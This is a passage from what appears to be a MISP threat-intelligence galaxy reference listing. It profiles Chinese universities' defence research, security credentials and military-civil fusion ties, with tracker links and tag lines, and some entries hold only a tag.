DLUT is directly under the administration of the Ministry of Education. In 2018, it came under the supervision of defence industry agency SASTIND as part of the government’s efforts to deepen military-civil fusion in the university sector. In 2006, the university received secret-level security credentials, allowing it to participate in classified defence technology projects. Since then, it has expanded cooperation with the PLA Navy and joined several military-civil fusion innovation alliances.In 2015, the university established a defence laboratory in the School of Mechanical Engineering. The laboratory was proposed by a professor within the University’s Institute of Science and Technology. The Institute of Science and Technology is primarily responsible for high-tech project management, where they manage projects for the 973 Program, the National Natural Science Foundation, and the Ministry of Education.

The tag is: misp-galaxy:china-defence-universities="Dalian University of Technology (大连理工大学)"

Table 614. Table References
Links
https://unitracker.aspi.org.au/universities/dalian-university-of-technology

Donghua University (东华大学)

DHU is subordinate to the Ministry of Education. It is actively involved in defence research on materials. It hosts the Key Laboratory of High Performance Fibers & Products, a defence-focused laboratory involved in materials science and textiles engineering research for China’s defence industry and weapons systems. The laboratory is specifically involved in developing materials for weapons casings, vehicular armour, aviation and cabling. The university holds secret-level security credentials, allowing it to participate in classified defence research projects.DHU claims that much of its research has been applied to fields such as defence technology and aviation, and contributed towards China’s space program and Beidou satellite navigation system. In 2018, the university signed a strategic cooperation agreement with the state-owned Jihua Group (际华集团) for collaboration on textiles to meet the military’s needs.

The tag is: misp-galaxy:china-defence-universities="Donghua University (东华大学)"

Table 615. Table References
Links
https://unitracker.aspi.org.au/universities/donghua-university

East China University of Technology (东华理工大学)

ECUT was founded in 1956 as the first institution of higher education for China’s nuclear industry. Since 2001, it has been subject to four ‘joint construction’ agreements between the Jiangxi Provincial Government and defence industry agency SASTIND or its predecessor COSTIND. These agreements are designed to develop the university’s involvement in defense-related research and training. The Ministry of Natural Resources and defence conglomerate China National Nuclear Corporation are also involved in supervising and supporting ECUT.ECUT carries out defence research related to nuclear science and hosts a defence laboratory on radioactive geology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects. In 2006, the East China University of Technology National Defence Technology Institute (东华理工大学国防科技学院) was established.

The tag is: misp-galaxy:china-defence-universities="East China University of Technology (东华理工大学)"

Table 616. Table References
Links
https://unitracker.aspi.org.au/universities/east-china-university-of-technology

Engineering University of the CAPF (中国人民武装警察部队工程大学)

The Engineering University of the CAPF is an institution devoted to training personnel in China’s paramilitary service, the People’s Armed Police, in command and engineering disciplines. The university focuses on paramilitary information engineering, paramilitary equipment technology, non-lethal weapons, military communications and mathematical cryptography. Students of the university can select majors from disciplines such as communications engineering, information security, military big data engineering, management science and engineering, and mechanical engineering.The Engineering University of the CAPF hosts the Key Military Laboratory for Non-Lethal Weapons (非致命武器等全军重点实验室), the Big Data and Cloud Computing Laboratory (大数据与云计算实验室), and the Command Automation Training Centre (指挥自动化培训中心), indicating expertise in these areas.The Engineering University of the CAPF has collaborated significantly with a Beijing-based company called SimpleEdu (北京西普阳光教育科技股份有限公司), focusing primarily on social media and internet research. Below is a list of initiatives with which the Engineering University of the CAPF has collaborated:

The tag is: misp-galaxy:china-defence-universities="Engineering University of the CAPF (中国人民武装警察部队工程大学)"

Table 617. Table References
Links
https://unitracker.aspi.org.au/universities/engineering-university-of-the-capf

Fudan University (复旦大学)

Fudan University is among China’s best universities. It was ranked 104th in the world by Times Higher Education in 2019. The university appears to engage high levels of work for the military on materials science, including stealth technology.All defence-related projects and matters in Fudan are managed by the university’s Institute of Special Materials and Technology (专用材料与装备技术研究院) and Defence Industry Secrets Committee (复旦大学军工保密委员会). The Institute of Special Materials and Technology specialises in defence research and works on simulations, precision manufacturing, and materials. Professor Ye Mingxin, the institute’s director, is also an advisor to the PLA and defence companies on materials science. Fudan University’s Materials Science Department includes one professor who is described as specifically being a ‘defence system professor’, which may refer to Professor Ye. In 2011, Fudan established a State Secrets Academy (国家保密学院), in partnership with China’s National Administration of State Secrets Protection (国家保密局). The institute carries out research and training on the protection of state secrets.

The tag is: misp-galaxy:china-defence-universities="Fudan University (复旦大学)"

Table 618. Table References
Links
https://unitracker.aspi.org.au/universities/fudan-university

Fuzhou University (福州大学)

Fuzhou University is overseen by the Fujian Provincial Government and a focus on engineering disciplines. It does not appear to engage in significant levels of defence research. However, the Fuzhou University Military-Civil Fusion Innovation Research Institute (福州大学军民融合创新研究院) was jointly established in 2016 by Fuzhou University along with a number defence companies and military research institutions under the guidance of Fujian Provincial Government’s National Defence Industry Office (省国防科工办). Furthermore, the Fujian Provincial People’s Government and SASTIND entered an agreement to jointly develop the university as part of China’s military-civil fusion initiative in 2018. This indicates that the university will expand its involvement in defence research. The university has held second-class weapons R&D secrecy credentials since 2006.

The tag is: misp-galaxy:china-defence-universities="Fuzhou University (福州大学)"

Table 619. Table References
Links
https://unitracker.aspi.org.au/universities/fuzhou-university

Guilin University of Electronic Science and Technology (桂林电子科技大学)

GUET specialises in electronics, communications and computer science. It engages in growing levels of defence research, indicated by the decision to place it under the joint administration of the defence industry agency SASTIND and the Guangxi Provincial Government in 2018.The PLA describes GUET as ‘Guangxi Province’s only university to have long carried out defence research.’ Areas of defence research at the university include communications technology, materials science, signals processing, microwaves, satellite navigation, and command and control. Since 2007, the university has held secret-level security credentials, enabling it to participate in classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Guilin University of Electronic Science and Technology (桂林电子科技大学)"

Table 620. Table References
Links
https://unitracker.aspi.org.au/universities/guilin-university-of-electronic-science-and-technology

Hangzhou Dianzi University (杭州电子科技大学)

HDU specialises in information technology and has been jointly supervised by the Zhejiang Provincial Government and defence industry agency SASTIND since 2007. The university is Zhejiang Province’s only provincial-level higher education institution to have officially designated national defence disciplines.HDU’s leadership is closely integrated with its defence research. Since its creation in 2008, the university’s main defence laboratory has been run by Xue Anke, who was the university’s president until 2017. While president, Xue served on an expert advisory committee to the PLA on information technology. He is also a member of the Zhejiang Provincial Expert Committee on Artificial Intelligence Development.Key areas of defence research at HDU include electronics, artificial intelligence, military-use software, and communications and information systems. HDU has been expanding its research on artificial intelligence, establishing a school of artificial intelligence and an artificial intelligence research institute in 2018.HDU holds secret-level security credentials, allowing it to undertake classified weapons and defence technology projects. In 2011, the Zhejiang State Secrets Bureau established a State Secrets Academy in HDU. The academy, one of twelve in the country, trains personnel in managing and protecting confidential information.

The tag is: misp-galaxy:china-defence-universities="Hangzhou Dianzi University (杭州电子科技大学)"

Table 621. Table References
Links
https://unitracker.aspi.org.au/universities/hangzhou-dianzi-university

Hangzhou Normal University (杭州师范大学)

Hangzhou Normal University is a Chinese university subordinate to the Zhejiang Provincial Government. The university was initially established in 1978 as Hangzhou Normal College (杭州师范学院) to focus on teacher training, art education as well as research in the humanities and natural sciences. Hangzhou Normal University retains this broad academic focus and oversees faculties such as the Alibaba Business School (阿里巴巴商学院).Hangzhou Normal University collaborates with China’s MPS on the development of surveillance technology. In March 2019, the university entered into an agreement with the Zhejiang Police College, the Zhejiang Public Security Office, and Hikvision—China’s leading producer of video surveillance technology—to establish a joint laboratory. The joint laboratory reportedly focuses on applying big data analysis, cloud computing and internet of things technology to improve China’s policing capability.

The tag is: misp-galaxy:china-defence-universities="Hangzhou Normal University (杭州师范大学)"

Table 622. Table References
Links
https://unitracker.aspi.org.au/universities/hangzhou-normal-university

Harbin Engineering University (哈尔滨工程大学)

HEU is one of China’s top defence research universities. The university is a leading centre of research and training on shipbuilding, naval armaments, maritime technology and nuclear power. 36.46% of the university’s 2017 graduates who found employment were working in the defence sector.As one of the group of universities subordinate to the Ministry of Industry and Information Technology (MIIT) known as the ‘Seven Sons of National Defence’ (国防七子), HEU is an integral part of China’s defence industry. HEU’s achievements include producing China’s first experimental submarine, ship-based computer, and hovercraft. The university claims to have participated in most of the PLA Navy’s submarine, undersea weapon, and warship projects.HIT’s role in the defence industry is highlighted by its formal affiliation with the PLA Navy, which became a supervising agency of the university in 2007. Under the supervisory agreement, the PLA Navy committed to developing HEU’s capacity as a platform for research and development in military technology and for training defence personnel. The following year, HEU established a Defence Education Institute to train reserve officers. Since then, the institute has trained at least 1,700 officers. HEU also maintains a joint laboratory with the PLA Navy Coatings Analysis and Detection Center.HEU is an important hub research on nuclear engineering, including on nuclear submarines. In 2018, it signed a co-construction agreement with defence conglomerate China National Nuclear Corporation (CNNC). In 2019, HEU and CNNC established the China Nuclear Industry Safety and Simulation Technology Research Institute. HEU also runs a joint laboratory on energetic materials (such as explosives) with the Chinese Academy of Engineering Physics, China’s nuclear warhead research organisation.

The tag is: misp-galaxy:china-defence-universities="Harbin Engineering University (哈尔滨工程大学)"

Table 623. Table References
Links
https://unitracker.aspi.org.au/universities/harbin-engineering-university

Harbin Institute of Technology (哈尔滨工业大学)

HIT is one of China’s top defence research universities. As one of seven universities run by MIIT, it is known as one of the ‘Seven Sons of National Defence’ (国防七子). The Seven Sons of National Defence all have close relationships with the Chinese military and are core training and research facilities for China’s defence industry. In 2018, HIT spent RMB1.97 billion (AUD400 million)—more than half of its research budget—on defence research. 29.96% of the university’s graduates that year who found employment were working in the defence sector.HIT has been described by Chinese state media as having ‘defence technology innovation and weapons and armaments modernisation as its core’. It excels in satellite technology, robotics, advanced materials and manufacturing technology, and information technology. Other areas of defence research at HIT include nuclear technology, nuclear combustion, nuclear power engineering and electronic propulsion and thruster technology, many of which are officially designated as skill shortage areas for the Chinese defence industry.HIT is best known for its aerospace research and has a close relationship with China Aerospace Science and Technology Corporation (CASC), a state-owned defence company that specialises in long-range ballistic missile and satellite technology. Since 2008, HIT and CASC have operated a joint research centre. Defence conglomerates CASC, CASIC, AVIC and CETC rank among the top employers of HIT graduates. The university is a major source of cyber talent and receives funding for information security research from the MSS, China’s civilian intelligence agency. A report prepared for the US–China Security and Economic Review Commission identified it as one of four universities focused on research with applications in information warfare. In 2003, HIT founded its Information Countermeasures Technology Research Institute (哈尔滨工业大学信息对抗技术研究所).

The tag is: misp-galaxy:china-defence-universities="Harbin Institute of Technology (哈尔滨工业大学)"

Table 624. Table References
Links
https://unitracker.aspi.org.au/universities/harbin-institute-of-technology

Harbin University of Science and Technology (哈尔滨理工大学)

HRBUST focuses on engineering, science, economics, management, philosophy, literature, law and education. In 2015, it was placed under the joint supervision of the Heilongjiang Provincial Government and SASTIND, which is an arrangement designed to develop the university’s involvement in defence-related research and training.HRBUST’s relationship with SASTIND indicates that it will continue expanding its role in defence research. Currently, the university has at least four designated national defense disciplines and plans to build a national defense key laboratory. It holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Harbin University of Science and Technology (哈尔滨理工大学)"

Table 625. Table References
Links
https://unitracker.aspi.org.au/universities/harbin-university-of-science-and-technology

Hebei University (河北大学)

Hebei University is Hebei Province’s only comprehensive university. The university subordinate to the Ministry of Education and also supervised by the Hebei Provincial Government and defence industry agency SASTIND. Its supervision by SASTIND, which began in 2013, is designed to support the university in ‘strengthening its national defence characteristics’.HBU appears to be relatively secretive about its defence research. In 2017, SASTIND designated an area of research at the university’s College of Physics Science and Technology as a ‘discipline with defence characteristics’. An article about this on the university’s news site has been taken down and deliberately did not specify the discipline. However, a speech given by the head of the college named military-use power and energy as HBU’s only defence discipline. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects.In 2017, HBU held a forum on military-civil fusion for technology and innovation to ‘uncover the university’s potential for defence-industry technological research’ and encourage greater integration with defence companies.

The tag is: misp-galaxy:china-defence-universities="Hebei University (河北大学)"

Table 626. Table References
Links
https://unitracker.aspi.org.au/universities/hebei-university

Hebei University of Science and Technology (河北科技大学)

HEBUST engages in moderate but growing levels of defence research. It has been supervised by defence industry agency SASTIND since 2013, when SASTIND and the Hebei Provincial Government agreed to jointly develop the university’s involvement in defence research. By 2017, the university claimed to have completed 300 defence projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects.While the university does not appear to have any dedicated defence laboratories, it has described five of its laboratories as platforms for defence research. Areas of materials science, mechanical engineering and control science at HEBUST have been designated ‘disciplines with national defence charcteristics’ by SASTIND. HEBUST may also be pursuing greater integration between China’s defence needs and the university’s research on textiles engineering and biological fermentation.HEBUST states that is has developed close cooperation with China Electronics Technology Group Corporation’s 54th Research Institute, an organization blacklisted by the US Government Entity List. Defence industry conglomerate Aviation Industry Corporation of China also funds research at the university.

The tag is: misp-galaxy:china-defence-universities="Hebei University of Science and Technology (河北科技大学)"

Table 627. Table References
Links
https://unitracker.aspi.org.au/universities/hebei-university-of-science-and-technology

Hefei University of Technology (合肥工业大学)

HFUT a leading Chinese university subordinate to the Ministry of Education. It specialises in engineering and engages in growing levels of defence research, particularly in the fields of advanced materials, smart manufacturing and electronic information. As of 2018, HFUT was the only civilian university in Anhui Province fully certified to carry out military projects, holding secret-level security credentials, and had undertaken over 200 such projects.In 2018, the university came under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND. According to HFUT, this agreement ‘will powerfully advance the university’s development of national defence disciplines, training of talent for defence industry, and construction of defence industry and national defence research platforms.’Miao Wei, head of the Ministry of Industry and Information Technology, which oversees China’s defence industry, is a graduate of HFUT.

The tag is: misp-galaxy:china-defence-universities="Hefei University of Technology (合肥工业大学)"

Table 628. Table References
Links
https://unitracker.aspi.org.au/universities/hefei-university-of-technology

Heilongjiang Institute of Technology (黑龙江工程学院)

HLJIT is an engineering-focused university that engages in growing levels of defence research. In 2015, the Heilongjiang Provincial Government partnered with defence industry agency SASTIND to expand the university’s ability to ‘show its national defence characteristics and serve the national defence science and technology industry.’SASTIND has designated military-use power and energy, optoelectronics and laser technology, and computing as three ‘disciplines with national defence characteristics’ at HLJIT. In June 2016, HLJIT and ZTE jointly launched an MOE-ZTE ICT Product-Teaching Integration Innovation Base (教育部-中兴通讯ICT产教融合创新基地) and established the Heilongjiang School of Engineering-ZTE Information and Communications Technology College (黑龙江工程学院-中兴信息通信技术学院). ZTE has been reportedly barred from US government contracts.As it increases its implementation of military-civil fusion, HLJIT has developed relationships with defence conglomerates. The university is particularly close to China Aerospace Science and Technology Corporation (CASC), a leading state-owned manufacturer of long-range missiles and satellites. In 2017, HLJIT partnered with a subsidiary of CASC to establish a joint research centre, the Aerospace Smart City Research Institute. The subsidiary, Aerospace Shenzhou Smart System Technology Co., Ltd. (航天神舟智慧系统技术有限公司), specialises in smart city and informatization technology.HLJIT holds confidential-level security credentials, allowing it to participate in confidential defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang Institute of Technology (黑龙江工程学院)"

Table 629. Table References
Links
https://unitracker.aspi.org.au/universities/heilongjiang-institute-of-technology

Heilongjiang University (黑龙江大学)

HLJU is supervised by the Ministry of Education, the Heilongjiang Provincial Government and SASTIND. SASTIND’s supervision of the university is designed to promote its integration with China’s defence technology goals. In 2016, the year after HLJU came under SASTIND’s supervision, the university received third-class security credentials and funding for a national defence technology research project for the first time. Third-class security credentials allow the university to participate in confidential defence research projects. By 2018, HLJU claimed to have received RMB13 million (AUD2.7 million) in defence research funding.HLJU has close ties with Russian universities and is best known for its work in the Chemistry, Chemical Engineering and Materials Department, which entered the top 1 percent of ESI’s global rankings.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang University (黑龙江大学)"

Table 630. Table References
Links
https://unitracker.aspi.org.au/universities/heilongjiang-university

Henan University of Science and Technology (河南科技大学)

HAUST is Henan province’s leading civilian university for defence research. In 2008, it became the first university in the province to receive security credentials allowing it to participate in classified weapons projects. In 2016, it became the province’s only university subject to a ‘joint-construction’ agreement with defence industry agency SASTIND, an arrangement designed to increase HAUST’s involvement in defence research. As early as 2009, the university stated that it had made great contributions to the defence and aviation industries, undertaking large amounts of defence research projects.HAUST describes itself as China’s primary university for research and training for the mechanical bearings (such as ball bearings) industry. SASTIND has designated three areas of research at the university as ‘disciplines with defence characteristics’, covering systems engineering, materials science and mechanics. The university is actively involved in military-civil fusion activities.The university claims to have made important contributions to the development of bearings for aircraft engines, satellites, and spacecraft. It states that it has resolved critical technological problems for specific weapons guidance systems, ballistic missile testing systems and an infrared targeting and interference emulation system that are probably used to test guided missiles.

The tag is: misp-galaxy:china-defence-universities="Henan University of Science and Technology (河南科技大学)"

Table 631. Table References
Links
https://unitracker.aspi.org.au/universities/henan-university-of-science-and-technology

Huazhong University of Science and Technology (华中科技大学)

HUST is one of China’s leading research institutions. While the university is subordinate to the Ministry of Education, it has also been supervised by the State Administration of Science, Technology and Industry for National Defense since 2012.The university hosts at least six laboratories dedicated to defence research. Its National Defence Research Institute reportedly oversees defence research in seven other HUST research centres. Artificial intelligence, shipbuilding, image processing, navigation technology, mechanical engineering, electronics, materials science and laser physics are focuses of HUST’s defence research.HUST has worked closely with the PLA and China’s defence industry. This collaboration includes the development artificial intelligence and imaging technology for weapons. The university’s work on pulsed power is linked to China’s nuclear and directed-energy weapons program. China’s state-owned defence conglomerates and China’s nuclear warhead facility sponsor dozens of HUST postgraduate students each year, who are required to work at their sponsoring organisation for at least five years after graduating.HUST holds secret-level security credentials, allowing it participate in research and production for classified weapons and defence projects.

The tag is: misp-galaxy:china-defence-universities="Huazhong University of Science and Technology (华中科技大学)"

Table 632. Table References
Links
https://unitracker.aspi.org.au/universities/huazhong-university-of-science-and-technology

Hunan University (湖南大学)

HNU is a leading Chinese university subordinate to the Ministry of Education. In recent years, its participation in defence research appears to have grown substantially. In 2010, it established the National Supercomputer Center in Changsha jointly with the PLA National University of Defense Technology, which has since been placed on the US Government Entity List for its suspected role in nuclear weapons research.In 2011, China’s defence industry agency, SASTIND, entered a partnership with the MOE to expand the university’s participation in defence research and defence industry ties. This arrangement was renewed in 2016. In 2013, SASTIND and the Hunan Provincial Government also signed an agreement to jointly support the development of the university’s National Supercomputer Center.HNU holds secret-level security credentials, enabling it to participate in research and production for weapons and other defence projects.

The tag is: misp-galaxy:china-defence-universities="Hunan University (湖南大学)"

Table 633. Table References
Links
https://unitracker.aspi.org.au/universities/hunan-university

Hunan University of Science and Technology (湖南科技大学)

HNUST is an engineering-focused university founded in 2003. In 2016, it was subject to a ‘joint-construction’ agreement between the Hunan Provincial Government and defence industry agency SASTIND, an arrangement designed to develop the university’s involvement in defense-related research and training. The university has three designated defence research areas, is involved in weapons research, and has confidential-level security credentials.HNUST is home to two national defence key laboratories, one of which is in the School of Materials Science and Engineering. The university has also established its Intelligent Manufacturing Institute, which evolved from a provincial key laboratory and has connections to the Made in China 2025 strategy.HNUST is also linked to state-owned arms manufacturer Norinco Group. In 2018, it signed a strategic cooperation agreement with arms manufacturer Norinco’s National Defence Key Laboratory on Light Weapons Terminal Lethality Technology (轻武器终点杀伤技术国防科技重点实验 aka 瞬态冲击技术国防科技重点实验室).

The tag is: misp-galaxy:china-defence-universities="Hunan University of Science and Technology (湖南科技大学)"

Table 634. Table References
Links
https://unitracker.aspi.org.au/universities/hunan-university-of-science-and-technology

Information Engineering University (中国人民解放军信息工程大学)

IEU was formed in June 2017, combining the old Information Engineering University with the PLA Foreign Languages University. PLA experts have described IEU as ‘the sole military academy for the cyber and electronic warfare arms of China’s network-electronic forces’.The IEU is currently subordinate to the PLA Strategic Support Force’s Network Systems Department, which holds the military’s signals intelligence capabilities. Previously, the university was run by the General Staff Department Third Department (commonly known as 3PLA), the PLA’s signals intelligence service that has been incorporated into the Strategic Support Force. IEU’s command tracks include Network Engineering (网络工程), which is dedicated to the cultivation of cyber attack and defense technical cadre (网络攻防技术干部). It is responsible for the construction of the Henan Provincial Laboratory of Visible Light Communication (河南省可见光通信重点实验室).The university is primarily known for research and training on hacking, cryptography, signals processing, surveying and mapping, and navigation technology. However, since absorbing the PLA Foreign Languages University, it now serves as one of the most important language schools for Chinese military intelligence officers, describing itself as a ‘whole-military foreign languages training base for individuals going abroad’. While the PLA Foreign Languages University is best known for training signals intelligence officers, it has also trained many officers in the PLA’s political warfare wing, the Central Military Commission Political Work Department Liaison Bureau.

The tag is: misp-galaxy:china-defence-universities="Information Engineering University (中国人民解放军信息工程大学)"

Table 635. Table References
Links
https://unitracker.aspi.org.au/universities/information-engineering-university-2

Institute of NBC Defense (陆军防化学院)

The Institute of NBC Defense is the PLA’s premier institution devoted to training junior, mid-career and senior officers on technology related to defence against nuclear, biological and chemical weapons. Most scientific research tends to focus on radiation protection and nuclear safety.

The tag is: misp-galaxy:china-defence-universities="Institute of NBC Defense (陆军防化学院)"

Table 636. Table References
Links
https://unitracker.aspi.org.au/universities/institute-of-nbc-defense

Jiangnan Social University (江南社会学院)

JSU trains intelligence officers in tradecraft and carries out research on intelligence and security. The university first opened in 1986 with over 600 students and staff. Since 1999, it has run the Journal of Jiangnan Social University, which publishes research on international security, strategy and politics. Satellite and streetview imagery from Google Maps and Baidu appears to show a shooting range at the southern end of its campus.

The tag is: misp-galaxy:china-defence-universities="Jiangnan Social University (江南社会学院)"

Table 637. Table References
Links
https://unitracker.aspi.org.au/universities/jiangnan-social-university

Jiangsu University of Science and Technology (江苏科技大学)

JUST engages in high levels of defence research. With a focus on research relevant to the PLA Navy, JUST is supervised by the China State Shipbuilding Corporation and the China Shipbuilding Industry Corporation, China’s leading defence shipbuilding conglomerates. In 2002, JUST was one of eight universities jointly supervised by defence industry agency COSTIND and a provincial government. In 2016, its was the subject of an agreement between the Jiangsu Provincial Government and defence industry agency SASTIND to expand its role in defence research.JUST scientists have been involved in nuclear submarine, unmanned submersible and aircraft carrier projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects.Faculties at the university involved in defence research include the School of Naval Architecture and Ocean Engineering and the School of Energy and Propulsion.

The tag is: misp-galaxy:china-defence-universities="Jiangsu University of Science and Technology (江苏科技大学)"

Table 638. Table References
Links
https://unitracker.aspi.org.au/universities/jiangsu

Jilin University (吉林大学)

JLU is directly under the administration of the Ministry of Education and came under the joint supervision of the ministry and defence industry agency SASTIND in 2016. In 2017, SASTIND designated eight fields of research at JLU as national defence disciplines, indicating the university carries out high levels of defence research. In 2012, JLU spent roughly RMB60 million (AUD12.5 million) on defence research, a number that is likely to have grown substantially.JLU’s National Defense Science and Technology Research Institute, also known as the Advanced Technology Research Institute, was established in April 2006 and is responsible for the organization and management of the university’s national defence science and technology projects. The research institute has received several certifications to conduct research for military applications. It conducts research in collaboration with the former PLA General Armaments Department, SASTIND, and state-owned defence conglomerates in the fields of aviation, aerospace, electronics, nuclear technology, and shipbuilding.JLU’s State Key Laboratory of Superhard Materials (超硬材料国家重点实验室) works closely with China’s nuclear weapons complex, the Chinese Academy of Engineering Physics (CAEP). Job advertisements for a CAEP subsidiary, the Center for High Pressure Science & Technology Advanced Research (北京高压科学研究中心) state that it has a branch within Jilin University. This suggests that CAEP may even be involved in managing the State Key Laboratory of Superhard Materials.The university hosts at least two defence research labs, located in the university’s College of Computer Science and Technology and in the College of Chemistry. Its Key Laboratory of Attack and Defense Simulation Technology for Naval Warfare, Ministry of Education (海战场攻防对抗仿真技术教育部重点实验室（B类）) is involved in cybersecurity research for the Navy. The lab’s academic committee is headed by a computer scientist from China Aerospace Science and Technology Corporation, a leading state-owned missile manufacturer.JLU holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Jilin University (吉林大学)"

Table 639. Table References
Links
https://unitracker.aspi.org.au/universities/jilin-university

Kunming University of Science and Technology (昆明理工大学)

Kunming University of Science and Technology appears to engage in low levels of defence research, but its involvement in defence research is likely to grow. In 2017, Kunming University of Science and Technology signed an agreement with Yunnan’s defence technology bureau to deepen military-civil fusion. In 2018, the Yunnan Provincial Government and defence industry agency SASTIND signed an agreement to jointly construct KMUST. The agreement is designed to increase the university’s involvement in defence research.KMUST carries out high levels of research on metallurgy. It is involved in defence research related to China’s aviation industry, and collaborates with defence shipbuilding conglomerate CSIC on vibration and noise research.

The tag is: misp-galaxy:china-defence-universities="Kunming University of Science and Technology (昆明理工大学)"

Table 640. Table References
Links
https://unitracker.aspi.org.au/universities/kunming-university-of-science-and-technology

Lanzhou University (兰州大学)

LZU’s involvement in defence research has slowly grown over the past decade. In 2018, it spent over RMB50 million (AUD10 million) on defence projects.LZU is subordinate to the Ministry of Education. Since 2018, it has also been supervised by defence industry agency SASTIND in an arrangement designed to further expand the university’s defence research and the defence industry relationships.LZU carries out national defence-related research in areas such as nuclear science, electromagnetism, probes, chemistry, mechanics, materials science, stealth technology and information technology.In 2017 and 2018, LZU signed strategic agreements with state-owned defence companies Norinco Group, China’s largest arms manufacturer, and China National Nuclear Corporation. Several defence companies, as well as China’s nuclear weapons program, provide scholarships for dozens of LZU postgraduate students each year. In return, these students must work for their sponsoring organisation for five years after graduation.In 2005, LZU received secret-level security credentials that allow it to participate in classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Lanzhou University (兰州大学)"

Table 641. Table References
Links
https://unitracker.aspi.org.au/universities/lanzhou-university

Lanzhou University of Technology (兰州理工大学)

The tag is: misp-galaxy:china-defence-universities="Lanzhou University of Technology (兰州理工大学)"

Table 642. Table References
Links
https://unitracker.aspi.org.au/universities/lanzhou-university-of-technology

Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)

The Logistics University of the People’s Armed Police Force is an institution devoted to training personnel in logistics for China’s paramilitary service, the People’s Armed Police. The university teaches subjects in applied economics, military logistics studies, paramilitary logistics, applied psychology, as well as communications and transportation engineering.The Logistics University of the People’s Armed Police Force actively collaborates with private institutions and civilian universities on scientific research. For example, the university collaborated with Nankai University (南开大学) and the Tianjin Eminent Electric Cell Material Company (天津爱敏特电池材料有限公司) on high performance lithium and sodium ion materials in 2018. The university also collaborated with the Tianjin Polytechnic University (天津工业大学) on intelligence, wearable technology that monitors heart rates for both military and civilian personnel.

The tag is: misp-galaxy:china-defence-universities="Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)"

Table 643. Table References
Links
https://unitracker.aspi.org.au/universities/logistics-university-of-the-peoples-armed-police-force

Nanchang Hangkong University (南昌航空大学)

NCHU engages in high levels of defence research relevant to the aviation industry. In 2017, the Ministry of Education designated it a ‘school with national defence education characteristics’, and 30% of graduates go to work in the defence industry or civilian aviation companies. The university has been supervised by defence industry agency SASTIND since 2010. It holds secret-level security credentials.Five fields of research at NCHU are designated ‘national defence key disciplines’: precision forming and joining technology, component quality testing and control, testing and measurement technology and instruments, optoelectric and laser technology, and military-use critical materials. The university hosts at least three laboratories focused on defence research.NCHU is particularly close to AVIC, the Chinese military’s aircraft manufacturing company. In particular, AVIC subsidiary Hongdu Aviation Industry Group (洪都航空工业集团) is based in Nanchang and has frequent exchanges with NCHU.

The tag is: misp-galaxy:china-defence-universities="Nanchang Hangkong University (南昌航空大学)"

Table 644. Table References
Links
https://unitracker.aspi.org.au/universities/nanchang-hangkong-university

Nanchang University (南昌大学)

NCU engages in low levels of defence research. It holds secret-level security credentials, allowing it to carry out classified defence research. In 2006, it established a defence research institute together with five provincial defence industry companies. Based on affiliated staff members, the institute may be focused on mechanical engineering.The university was added to the US Government Unverified List in 2018. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Nanchang University (南昌大学)"

Table 645. Table References
Links
https://unitracker.aspi.org.au/universities/nanchang-university

Nanjing Army Command College (南京陆军指挥学院)

The Nanjing Army Command College is an institute devoted to training mid-career staff officers in preparation for command the PLA Ground Force. Disciplines of focus for the college include joint campaign tactics, warfighting command, military training and combat simulations.

The tag is: misp-galaxy:china-defence-universities="Nanjing Army Command College (南京陆军指挥学院)"

Table 646. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-army-command-college

Nanjing Institute of Information Technology (南京信息技术研究院)

The tag is: misp-galaxy:china-defence-universities="Nanjing Institute of Information Technology (南京信息技术研究院)"

Table 647. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-institute-of-information-technology

Nanjing Normal University (南京师范大学)

Nanjing Normal University is a leading Chinese university supervised by the Ministry of Education and Jiangsu Provincial Government. The university has strengths in geospatial technology, big data and artificial intelligence.Nanjing Normal University has close ties to the Ministry of Public Security. In 2014, the university established the Ministry of Public Security Key Laboratory for Police Geospatial Information Technology (警用地理信息技术公安部重点实验室), which researches applications of geospatial information technology for policing purposes. Nanjing Normal University has also entered into an agreement with the Nanjing Municipal Public Security Bureau, establishing the ‘Video GIS Technology Laboratory’ (视频GIS技术实验室) in April 2012.Nanjing Normal University has a close relationship with the regional government in Xinjiang, where over 1 million Uyghurs and Kazakhs are currently held in internment camps. In 2015, the university entered into an agreement with the Xinjiang Uyghur Autonomous Government and the Jiangsu Municipal Government to support the development of Yili Normal University.

The tag is: misp-galaxy:china-defence-universities="Nanjing Normal University (南京师范大学)"

Table 648. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-normal-university

Nanjing Tech University (南京工业大学)

In 2016, NJTech came under the joint supervision of the Jiangsu Provincial Government and defence industry agency SASTIND, which is an arrangement designed to develop the university’s involvement in defense-related research and training. The university has four designated defence research areas and secret-level security credentials, allowing it to undertake classified defence technology projects.NJTech is expanding its defence research on materials science, chemistry, optical engineering and systems engineering. In 2018, the university established a Military-Civil Fusion Development Research Institute to deepen its implementation of military-civil fusion. NJTech has a Defence Industry Science Office (军工科研办公室) within its Depart of Scientific of Research. This office is responsible for the university’s defence-related research and coordination. NJTTech’s School of Materials Science and Engineering (材料科学与工程学院) has previously worked on defence-related projects.The university has international ties with universities in England that focus on electronics and semiconductors. It has also established a joint research center with Russian universities for advanced technology R&D.

The tag is: misp-galaxy:china-defence-universities="Nanjing Tech University (南京工业大学)"

Table 649. Table References
Links
https://unitracker.aspi.org.au/universities/nanjing-tech-university

Nanjing University (南京大学)

